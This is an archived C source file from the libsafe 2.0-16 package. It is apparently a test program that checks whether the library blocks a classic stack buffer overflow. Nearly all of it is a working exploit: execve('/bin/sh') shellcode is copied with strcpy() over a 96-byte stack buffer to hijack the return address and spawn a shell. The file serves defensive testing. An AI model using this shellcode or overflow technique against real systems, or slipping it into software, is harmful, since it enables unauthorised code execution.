libsafe-.*: exploits/t3.c

"Fossies" - the Fresh Open Source Software Archive

Member "libsafe-2.0-16/exploits/t3.c" (12 Jun 2002, 1905 Bytes) of package /linux/misc/old/libsafe-2.0-16.tgz:

As a special service "Fossies" has tried to format the requested source page into HTML format using (guessed) C and C++ source code syntax highlighting (style: standard) with prefixed line numbers and code folding option. Alternatively you can here view or download the uninterpreted source code file.

    1 /*
    2  * $Name: release2_0-16 $
    3  * $Id: t3.c,v 1.6 2002/06/12 20:30:37 ttsai Exp $
    4  */
    5 
    6 
    7 #include <unistd.h>
    8 #include <stdio.h>
    9 #include <string.h>
   10 #include <stdlib.h>
   11 
   12 char shellcode[] =
   13     "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
   14     "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
   15     "\x80\xe8\xdc\xff\xff\xff/bin/sh";
   16 
   17 char large_string[128];
   18 
   19 /*
   20  * Return 1 if at least one of the bytes in addr is 0x00; else return 0.
   21  */
   22 int contains_null_bytes(caddr_t addrp) {
   23     uint addr = (uint) addrp;
   24     return !(addr & 0xff &&
   25          addr & 0xff00 &&
   26          addr & 0xff0000 &&
   27          addr & 0xff000000);
   28 }
   29 
   30 void foo()
   31 {
   32     char buffer[96], *p;
   33     long *long_ptr = (long *) large_string;
   34     int i;
   35 
   36     /*
   37      * Make sure that there are no zero bytes in the starting address in
   38      * buffer[].  If so, find the first address containing no zero bytes.
   39      */
   40     for (p=buffer; contains_null_bytes(p); p++);
   41     if (contains_null_bytes(p)) {
   42     printf("We can't find an acceptable address that doesn't contain\n");
   43     printf("a zero byte.  Giving up.\n");
   44     exit(-1);
   45     }
   46 
   47     for (i = 0; i < 32; i++)
   48     *(long_ptr + i) = (int) p;
   49     for (i = 0; i < sizeof(shellcode)-1; i++)
   50     large_string[i] = shellcode[i];
   51     strcpy(p, large_string);
   52 
   53     return;
   54 }
   55 
   56 int main(int ac, char *av[])
   57 {
   58     if (ac == 1) {
   59     printf
   60         ("This program will exec() a new program.  The new program will\n");
   61     printf("overflow the buffer using strcpy().\n");
   62     printf("If you get a /bin/sh prompt, then the exploit has worked.\n");
   63     printf("Press any key to continue...");
   64     getchar();
   65     execl(av[0], av[0], "xyz", NULL);
   66     perror("execl()");
   67     } else if ((ac != 2) || (strcmp(av[1], "xyz") != 0)) {
   68     printf("usage: %s\n", av[0]);
   69     exit(1);
   70     }
   71 
   72     foo();
   73 
   74     printf("If you see this statement, it means that the buffer overflow\n");
   75     printf("never occurred.\n");
   76 
   77     return 0;
   78 }